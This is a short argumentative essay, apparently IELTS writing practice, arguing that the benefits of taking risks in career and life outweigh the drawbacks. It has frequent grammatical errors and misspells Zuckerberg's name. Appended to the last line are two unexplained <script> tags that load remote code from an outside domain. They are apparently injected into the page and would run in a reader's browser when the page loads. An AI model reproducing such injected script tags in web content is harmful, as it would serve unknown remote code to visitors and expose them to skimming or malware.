***2.It is important for people to take risks, in both their professional lives and personal lives.***

***Do the advantages of taking these risks outweigh the disadvantages?***

It is believed that embracing risks is paramount importance for individuals’ career path and their life. Although, there are some drawbacks, I firmly think that it is overshadowed by numerous benefits.

On the one hand, taking risks can pose a serious threat to one’s financial condition and professional. This happens when those venturing all their savings to the financial market without a proper evaluation and knowledge may run higher risks of being insolvent or going bankrupt. For instance, in Vietnam, a large number of people being inadequate for economics understanding invested all their budget in some real estate projects. As a result, they suffered from a dire consequence of this investment decision by not only losing all their money but also owing a massive debt. Therefore, it is necessary to take all life-changing decisions into consideration prior to taking risks.

On the other hand, risk taking plays a pivotal role in individuals’ career paths as well as their life. Since it allows people to get out of their comfort zone in order to reach their full potential. Taking Mark Zukerberg as an example, if he had not dropped out of Harvard University, he would not have founded Facebook, which is a giant global technology firms let alone becoming one of the wealthiest men in the world. Hence, so as to reach the pinnacles of success, human should be used to embracing risks.

To summarize, while risk taking is fairly adverse, I strongly concur that its positive impacts can outweigh those limitations.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>